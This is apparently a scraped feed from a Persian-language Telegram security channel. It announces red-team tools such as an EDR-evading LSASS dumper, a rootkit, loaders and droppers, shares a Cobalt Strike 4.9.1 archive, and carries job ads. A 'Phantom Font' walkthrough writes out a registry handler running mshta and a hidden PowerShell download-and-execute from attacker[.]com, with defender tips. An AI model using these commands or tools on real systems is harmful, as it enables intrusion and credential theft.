Network Security Channel
2.57K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
🍥 muddy
یک کتابخانه مبهم کننده برای جلوگیری از شناسایی توسط ابزارهای ساده تجزیه و تحلیل باینری استاتیک مانند strings یا YARA Rules طراحی شده است که با رمزگذاری برنامه در زمان ساخت و رمزگشایی آن در زمان اجرا عمل می کند.

💠 https://github.com/orph3usLyre/muddy-waters

#RedTeam
#obfuscation
@Engineer_Computer
⭕️ یکی از تکنیک‌های MITRE ATT&CK که در تاکتیک Credential Access جای می‌گیرد، Forced Authentication است.
از تکنیک جدیدی که می‌توان به منظور Forced Authentication بهره‌برداری نمود، و نیز از ابزار‌های پیشفرض Microsoft بوده و ذیل باینری‌های LOLBIN است، ابزار comp.exe است.
این ابزار به منظور مقایسه فایل به شکل byte-to-byte استفاده می‌شود.
یکی از قابلیت‌های این نرم‌افزار، دریافت و مقایسه یک فایل از SMB Share است.
با توجه به اینکه می‌بایست احراز هویت در SMB را به منظور دریافت فایل انجام دهد، می‌توان NTLM Hash را با استفاده از یک Rogue SMB مانند Responder به سرقت برد.

لینک مربوط به تکنیک در گیت‌هاب LOLBAS:
https://github.com/LOLBAS-Project/LOLBAS/pull/341/files

#Redteam #SMBhash #ForcedAuthentication

@Engineer_Computer
1
⭕️ اگر علاقه مند به توسعه RootKit در محیط ویندوز هستید پروژه ای توسعه داده شده که به مطالعه آن میپردازیم.
از ویژگی های این پروژه میتوان به موارد زیر اشاره کرد:

Kill processes

ZwTerminateProcess is simply called from kernel land to terminate any process. Additionally, you can bury a process to avoid it to restart by setting a kernel callback to process creation: If the target process is created, Banshee will set the CreationStatus of the target process to STATUS_ACCESS_DENIED.

Change protection levels

This is done by modifying the EPROCESS structure, which is an kernel object that describes a processes attributes. It also holds a value that specifies the protection level of the process.
We can directly modify this value (aka Direct Kernel Object Modification or DKOM), since we are operating in Ring 0.

Elevate any process token to SYSTEM

EPROCESS also holds a pointer to the current access token, so we can just make it point to e.g. the token of process 4 (SYSTEM) to elevate any process to SYSTEM

Enumerating and erasing kernel callbacks

For now, only Process- and Thread-Creation kernel callbacks are enumerated, by parsing the PsSetCreateNotifyProcess/ThreadRoutine routine to reach the private Psp* routine and then parsing the address of the array, where kernel callbacks are stored.

Protecting the driver file

By hooking the NTFS filesystem's IRP_MJ_CREATE handler, we can block any process from opening a handle to our driver file

Hide Process by PID

Again, EPROCESS comes to help here - it contains a LIST_ENTRY of a doubly linked list called ActiveProcessLink which is queried by Windows to enumerate running processes. If we simply unlink an entry here, we can hide our process from tools like Process Monitor or Task Manager.

#RedTeam #RootKit #MalDev
@Engineer_Computer
⭕️ اگر با C2 معروف Cobalt Strike کار کرده باشید با Beacon Object File (BOF) ها آشنا هستید.BOF ای توسعه داده شده که جایگزینی برای دستورات Spawnas و Inject است که با دستور spawn_with [pid] [listener] از آن میتوان استفاده کرد.
حال به فرایند آن میپردازیم:

Obtain a handle to the target process.
Obtain a handle to the process' primary token.
Duplicate the primary token to an impersonation token.
Get the Beacon spawnto value.
Attempt to spawn a new process with the duplicated token using CreateProcessWithTokenW.
If this attempt fails, try CreateProcessAsUserW.
Inject the Beacon shellcode into the spawned process.
Link to the Beacon in the case of P2P.

#RedTeam #Beacon #C2
@Engineer_Computer
⭕️ Loader ای با Golang نوشته شده که توانایی اجرای ShellCode با تکنیک Process hollowing و استفاده از تکنیک های anti-sandbox و anti-analysis و رمزنگاری 3DES در آن را دارد.
برخی ویژگی های این لودر:

3DES Encryption
Sandbox Evasion
Analysis Evasion
Execution delay
Process Hollowing
Sign to cs and msf

#RedTeam #Evasion
@Engineer_Computer
👍1
⭕️ کد جدیدی به جهت Dump کردن LSASS توسعه داده شده که قابلیت دور زدن AV و EDR های زیر را دارد:

Windows Defender
Malwarebytes Anti-Malware
CrowdStrike Falcon EDR (Falcon Complete + OverWatch)

از جمله ویژگی های این کد میتوان مثال زد:

Manually implementing NTAPI operations through indirect system calls
Disabling Breaking telemetry features (i.e ETW)
Polymorphism through compile-time hash generation
Obfuscating API function names and pointers
Duplicating existing LSASS handles instead of opening new ones
Creating offline copies of the LSASS process to perform memory dumps on
Corrupting the MDMP signature of dropped files
Probably other stuff I forgot to mention here


#RedTeam #Evasion
@Engineer_Computer
👍1
⭕️ پروژه ای توسعه داده شده که Dropper ای از نوع Macro Office ها ایجاد میکند.
این پروژه با استفاده از DLL SideLoading و Embed کردن در LNK فایل اقدام به دور زدن Mark of The Web (MOTW) میکند.

https://github.com/SaadAhla/dropper
#RedTeam #MalDev
@Engineer_Computer
Cobalt_Strike_v4.9.1.7z
68.9 MB
CS491
cobalt strike
یکی از ابزار های بشدت قدرتمند در حوزه رد تیم که نیازه🔥
@Engineer_Computer
#redteam
♨️ ابزار DriverJack به منظور بارگذاری یک درایور آسیب‌پذیر در سیستم از تکنیک‌های کمتر شناخته شده NTFS استفاده می‌کند. هدف اصلی این ابزار، دور زدن روش‌های معمول برای ثبت و بارگذاری درایورها در سیستم است. این ابزار با ربودن سرویس‌های موجود و جعل مسیرهای درایور، میتواند موفق به پنهان‌سازی درایور مخرب شود.

☠️ مراحل کلیدی حمله

🦠 دور زدن ثبت سرویس درایور
این روش به مهاجم اجازه می‌دهد که بدون نیاز به ثبت سرویس درایور جدید، از سرویس‌های موجود در سیستم سوءاستفاده کند و درایور آسیب‌پذیر را بارگذاری کند

🦠 جعل مسیر درایور
در هنگام بارگذاری درایور، مسیر فایل درایور به‌گونه‌ای جعل می‌شود که به نظر برسد فایل درایور از مسیری دیگر (مثلاً یک فایل ISO نصب شده) بارگذاری شده است. این کار تشخیص درایور مخرب را توسط سیستم‌های نظارتی دشوارتر می‌کند

🦠 سوءاستفاده از سیستم فایل شبیه‌سازی شده (Emulated Filesystem)
ابزار DriverJack همچنین از یک ضعف در سیستم فایل استفاده می‌کند که به آن امکان می‌دهد فایل‌های موجود روی فایل‌سیستم‌های شبیه‌سازی شده (مثل ISO) را به صفحاتی قابل نوشتن (RW) مجدد تبدیل کند و محتوای آن‌ها را تغییر دهد. این تکنیک به عنوان "Read-Only Bypass" شناخته می‌شود و در کتابخانه IoCdfsLib پیاده‌سازی شده است.

📚 در سیستم‌عامل ویندوز، فایل‌ها و دایرکتوری‌ها می‌توانند به صورت شبیه‌سازی شده (Emulated) بارگذاری شوند. این یعنی فایل‌ها می‌توانند از طریق فایل‌های ایمیج، مانند فایل‌های ISO، به سیستم معرفی شوند و به نظر برسد که بخشی از سیستم فایل عادی هستند. به عنوان مثال، وقتی یک فایل ISO را روی سیستم باز می‌کنید، محتوای آن به صورت یک درایو مجازی (مثل درایو CD) در سیستم نمایش داده می‌شود و این درایو به طور معمول فقط خواندنی (Read-Only) است، یعنی نمی‌توانید محتویات آن را تغییر دهید.
💢 این ابزار با استفاده از کتابخانه IoCdfsLib ، فایل‌های موجود در این درایو مجازی را از حالت فقط خواندنی به قابل نوشتن تبدیل می‌کند
سپس محتوای این فایل‌ها را تغییر می‌دهد تا درایور مخرب خود را جایگزین فایل‌های معتبر کند.

🕷 پس از دستکاری فایل‌ها، درایور مخرب به عنوان یک فایل معتبر از درایو ISO بارگذاری می‌شود، و این فرآیند به سیستم اجازه می‌دهد تا بدون تشخیص مخرب بودن، این درایور را بارگذاری کند.
👁‍🗨 https://github.com/klezVirus/DriverJack

#tools
#RedTeam

@Engineer_Computer
1
⭕️ از سال 2020، گروه‌های هکری وابسته به چین به دستگاه‌های edge مانند فایروال‌ها، VPNها و دستگاه‌های اینترنت اشیا (IoT) در زیرساخت‌های دولتی تایوان نفوذ کردند
این هکرها با استفاده از آسیب‌پذیری‌های (0-day) در دستگاه‌هایی مانند فایروال‌های Sophos و VPNهای Array SSL، از این دستگاه‌ها برای ایجاد بات‌نت‌ها، پخش اطلاعات نادرست و سرقت داده‌های حساس استفاده می‌کنند.

🔺 این حملات شامل تکنیک‌های پیشرفته‌ای مانند بک‌دورهای مبتنی بر port-knocking و سو استفاده از (LoLbin) هستند که به مهاجمان اجازه می‌دهد تا بدون شناسایی توسط نرم‌افزارهای امنیتی به سیستم‌ها نفوذ کنند و کنترل آنها را به دست بگیرند.

♨️ در این ارائه، نمونه‌های واقعی از دستگاه‌های edge که توسط این حملات هدف قرار گرفته‌اند و راه‌های مقابله با این تهدیدات را بررسی خواهد کرد.


🌐 https://www.youtube.com/watch?v=PSaix1C-UMI
Slides: https://teamt5.org/en/posts/black-hat-asia-2024/

#RedTeam
#APT
#Black_Hat_Asia_2024

@Engineer_Computer
🔘 یک ابزار شناسایی و بهره‌برداری از Active Directory برای تیم‌های قرمز (Red Teams) است که با استفاده از پروتکل Active Directory Web Services (ADWS) داده‌های Active Directory را جمع‌آوری و تغییر می‌دهد.

معمولا جمع آوری اطلاعات به واسطه پروتکل LDAP انجام میشود اما SharpADWS توانایی جمع آوری اطلاعات را بدون ارتباط مستقیم با سرور LDAP دارد.

💎SharpADWS
https://github.com/wh0amitz/SharpADWS

#ActiveDirectory #REDTEAM

@Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
⭐️FREE LABS RED TEAM/BLUE TEAM and CTF SKILLS TO 2025

💎Share with your network and friends.💎

· Attack-Defense - https://attackdefense.com
· Alert to win - https://alf.nu/alert1
· Buffer Overflow Labs - https://github.com/CyberSecurityUP/Buffer-Overflow-Labs
· CryptoHack - https://cryptohack.org/
· CMD Challenge - https://cmdchallenge.com
· Cyberdefenders - https://cyberdefenders.org/blueteam-ctf-challenges/
· Damn Vulnerable Repository - https://encurtador.com.br/ge2Rp
· Defend The Web - https://defendtheweb.net/
· Exploitation Education - https://exploit.education
· Google CTF - https://capturetheflag.withgoogle.com/
· HackTheBox - https://www.hackthebox.com
· Hacker101 - https://ctf.hacker101.com
· Hacking-Lab - https://hacking-lab.com/
· ImmersiveLabs - https://immersivelabs.com
· Infinity Learning CWL - https://cyberwarfare.live/infinity-learning/
· LetsDefend- https://letsdefend.io/
· NewbieContest - https://www.newbiecontest.org/
· OverTheWire - https://overthewire.org
· Practical Pentest Labs - https://practicalpentestlabs.com/
· Pentestlab - https://pentesterlab.com
· Penetration Testing Practice Labs - https://www.amanhardikar.com/mindmaps/Practice.html
· PentestIT LAB - https://lab.pentestit.ru
· PicoCTF - https://picoctf.com
· PWNABLE - https://pwnable.kr/play.php
· Root-Me - https://www.root-me.org
· Red Team Exercises - https://github.com/CyberSecurityUP/Red-Team-Exercises
· Root in Jail - https://rootinjail.com
· SANS Challenger - https://www.holidayhackchallenge.com/
· SmashTheStack - https://smashthestack.org/wargames.html
· The Cryptopals Crypto Challenges - https://cryptopals.com
· Try Hack Me - https://tryhackme.com
· Vulnhub - https://www.vulnhub.com
· Vulnmachine - https://www.vulnmachines.com/
· W3Challs - https://w3challs.com
· WeChall - https://www.wechall.net
· Websploit - https://websploit.org/
· Zenk-Security - https://www.zenk-security.com/
Did I forget a lab? comment there

#ctf #pentest #redteam #blueteam #hacking #informationsecurity #cybersecurity

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
5🤩2🎉1
#استخدام #کارشناس_تست_نفوذ
تیم امنیت ابرآمد، از متخصصان حوزه تست نفوذ و امن‌سازی Web Application از شما دعوت به همکاری می‌کند 🛸

مهارت‌های تخصصی مورد نیاز:
👾 آشنایی با متدلوژی OWASP (ASVS & WSTG)
👾 تسلط بر حملات Server-side & Client-side
👾 تسلط بر تجزیه‌ و تحلیل آسیب‌پذیری‌ها و توانایی اجرا و تغییر اکسپلویت‌ها
👾 تسلط بر کار با ابزارهای تست نفوذ (Burp suite ,nuclei, …)
👾 تسلط بر گزارش‌نویسی و ارائه راهکارهای برطرف‌سازی آسیب‌پذیری
👾 آشنایی با وب‌ اپلیکیشن فایروال‌های متداول و تسلط بر تکنیک‌های ارزیابی و دور زدن آنها
👾 داشتن مهارت کار تیمی

مهارت‌هایی که برخورداری از آنها مزیت محسوب می‌شود:
⭐️ علاقه‌مند به اجرای فرآیند‌های Red Teaming (آشنا با فریمورک MITRE ATT&CK)
⭐️ سابقه فعالیت در پلتفرم‌های داخلی و خارجی باگ بانتی
⭐️ دارا بودن تفکر تحلیلی و علاقه‌مند به رویارویی با چالش‌های فنی تست نفوذ
⭐️ علاقه‌مند به R&D در حوزه حملات پیشرفته و تحلیل آسیب‌پذیری‌ها

نیازمندی‌های همکاری:
🔶 ۳ تا ۵ سال سابقه تست نفوذ وب
🔶 داشتن کارت پایان خدمت یا معافیت دائمی برای آقایان
🔶 امکان حضور در شرکت (تهران)

برای اطلاع از مزایای همکاری با ابرآمد و ارسال رزومه، از لینک زیر استفاده کنید:

🔗 https://www.abramad.com/jobs/

بخشی از داستان ما باشید 💙


#WebSecurity #PenetrationTesting #OWASP #BurpSuite #VulnerabilityAssessment #ExploitDevelopment #RedTeam #CyberSecurityJobs #BugBounty #AppSec #WAFBypass #SecurityExperts #InfosecCareers #EthicalHacking #SecurityHiring

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Job Title: Cyber Security Specialist
Duration: 12 months extendable (Long Term with Marc Ellis Payroll)
Location: Riyadh, KSA

Summary:
We are seeking a skilled and proactive hashtag#RedTeam Cybersecurity Specialist to join our cybersecurity defence team. In this role, you will play a critical part in monitoring, analyzing, and defending against cyber threats.

Job Requirements:

1- Have completed these courses:
Cyber Security Specialization
Security+
Ethical Hacking
Protect systems from penetrations
Cybersecurity Attack Techniques
CCNA Security
Penetration Testing
Introduction to Python Programming
Digital Literacy
Web Application Hacking and Security

2- Candidate should have sufficient experience in using tools, including:
Acunetix
Burp Suite
Netsparker
Maltego
Nmap
SQL Injection
Metasploit
3- Good knowledge of all operating systems
4- Good knowledge of servers, hosting files and how to deal with them
5- Worked as a black hat hacker previously

Interested candidates can send your CV to: [email protected]

#jobs #hiring #jobsindubai #dubaijobs #dubaicareers #uaejobs #uae #uaecareers #ksacareer #ksajobs #saudijobs #saudihiring #ksa #saudiarabiajobs #riyadhjobs #qatarjobs #dohajobs #qatar #ksajobs #riyadhjobs #dubaijobs #uaejobs

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1🔥1🤩1
🚨 We're Hiring: Security Consultant (Penetration Testing)
📍 Location: Bangalore
💼 Work Mode: Hybrid
🛡 Experience Level: 3–5 years

Are you passionate about cybersecurity and penetration testing? Join our team as a Security Consultant, where you'll lead hands-on engagements, work with global and regulated industry clients, and play a key role in strengthening their security posture.

🔍 What You'll Do:
> Lead network, application, API, and cloud penetration testing
> Conduct Red & Purple Team assessments
> Identify vulnerabilities and provide expert remediation guidance
> Collaborate with clients and internal teams to deliver actionable security insights
> Mentor junior team members and contribute to research & tool development

🛠 What We're Looking For:
> 3–5 years of hands-on pen testing experience
> Strong scripting and problem-solving skills
> Certifications like OSCP, GPEN, GWAPT, GXPN, CREST (preferred)
> Excellent communication and project leadership skills
> Experience with Cobalt Strike is a plus

If you're self-driven, detail-oriented, and thrive in a collaborative and fast-paced environment, we want to hear from you!
🔗 Scan the below QR code and apply now or DM us to learn more.

Let’s build a safer digital world together.
#CyberSecurityJobs #PenetrationTesting #InfoSec #SecurityConsultant #Hiring #RedTeam #PurpleTeam #OSCP #InfosecCareers

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 We're Hiring: Remote Penetration Tester Trainer (Egypt Region) 🛡

Are you passionate about offensive security? Do you love sharing knowledge and helping others think like hackers.

We’re looking for a Penetration Testing Trainer to join our team remotely and help build the next generation of ethical hackers and red teamers in the Egypt region.

💼 Position: Penetration Tester Trainer
🌍 Location: Remote (Egypt-based candidates preferred)
🕐 Type: Part-Time

What You’ll Do

Deliver interactive training on ethical hacking, red teaming, and exploitation techniques.

Develop hands-on labs, CTF challenges, and real-world scenarios.

Guide and mentor learners — from beginners to advanced students.

Stay updated with the latest tools, vulnerabilities, and trends.

Contribute to a unique, modern, and ethical hacker learning experience.

💡 You Should Have:

Strong experience in penetration testing or red teaming

Deep knowledge of tools like Burp Suite, Nmap, Metasploit, etc.

Clear communication skills and a passion for teaching.

Experience with CTF platforms or lab creation is a big bonus.

Based in Egypt and able to commit remotely.

🚀 Whether you're an experienced ethical hacker ready to share your knowledge, or a trainer with deep red teaming expertise — we want to hear from you!

📩 Apply Now and send your cv to:
[email protected]

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

#CyberSecurityJobs #PenetrationTesting #TrainerJob #RedTeam #RemoteWork #EthicalHacking #CybersecurityEgypt #InfoSecJobs #HiringNow #CTF #Penforce
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1🕊1👨‍💻1
بعضی‌ها رسماً به مرحله‌ای رسیدن که دارن «چیزهای رایگان» رو هم می‌فروشن!

این روزها نسخه آماده #Nessus از طریق #Docker رایگان و در دسترس همه‌ست… ولی دیدم بعضی‌ها همین رو بسته‌بندی کردن و با قیمت بالا می‌دن به ملت 🤦‍♂️

هیچ جادوی خاصی پشتش نیست، فقط یک docker pull ساده‌ست!

واقعاً حیفه که وقت و پول مردم صرف چیزی بشه که با یک خط دستور میشه آورد بالا.

📂 لینک نسخه آماده روی Docker Hub:

https://hub.docker.com/r/sakurashiro/nessus

#nessus #docker #vulnerability_assessment #cybersecurity #infosec #soc #securitytools #redteam #blueteam #hide01

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍3👏1🕊1
🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد می‌شود!

یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم می‌توانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!



🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟

پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایل‌های hta (HTML Application) طراحی شده است.
این فایل‌ها می‌توانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا می‌کند.

📌 محل پیش‌فرض:
C:\\Windows\\System32\\mshta.exe



چرا مهاجمان عاشق mshta.exe هستند؟

به‌صورت پیش‌فرض در ویندوز نصب است (Living Off The Land)
اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
اغلب در لیست سفید آنتی‌ویروس و EDR قرار دارد
ابزاری برای اجرای حملات Fileless و مخفیانه



📌 نمونه استفاده مخرب:


mshta.exe "javascript​ : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"




🧩 مراحل حمله فونت شبح:

1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت می‌کند (مثلاً CorpSans.ttf)
اما به‌جای فونت، یک فایل مشکوک .reg را دانلود می‌کند.

2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام fontview:// تعریف می‌کند.
و می‌گوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:


[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript​:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""


3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به fontview://load ریدایرکت می‌شود.
پراسس mshta.exe اجرا می‌شود، مقدار Payload از رجیستری خوانده می‌شود و PowerShell مخفیانه اجرا می‌شود:

javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);




🔍 چرا این حمله خطرناک است؟

Fileless → هیچ فایل اجرایی روی دیسک نیست
استفاده از ابزار قانونی ویندوز (mshta.exe)
ذخیره کد در رجیستری → بدون فایل مشکوک
اجرا به‌صورت Stealth (بدون پنجره و هشدار)



🛡 نکات مهم برای Blue Team:

🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید
🔸 هر اجرای ناگهانی mshta بدون فایل .hta را بررسی کنید
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک



🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!

#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
2👏2🔥1🎉1🤩1
Forwarded from IrHackerSho
🚨 وقت انفجار از نوع دانش در سمینار بعدی 🚨

مهمان ویژه : دوست و برادر عزیزم متین نوریان (@matitanium) – باگ هانتر حرفه ای با ۴+ سال تجربه

🔥 کشف RCE کامل روی سرورهای دیوار ( با اجازه رسمی منتشر شده )
💰 بانتی خفن باگ لاجیکال روی دیوار
🧨 الان متخصص Red Team ، با مهارت‌های پیشرفته

رازهای شکار باگ‌های سنگین و درآمد دلاری/تومانی رو مستقیم از یکی از بهترین‌ها بشنوید!

ظرفیت محدود – همین حالا به اشتراک بزارید

لینک ثبت‌نام هم در همین کانال 15 مین قبل از شروع سمینار ارسال میشه

#باگ_بانتی #RedTeam #متین_نوریان #رامین_آقابیگی #وصال_فیروزی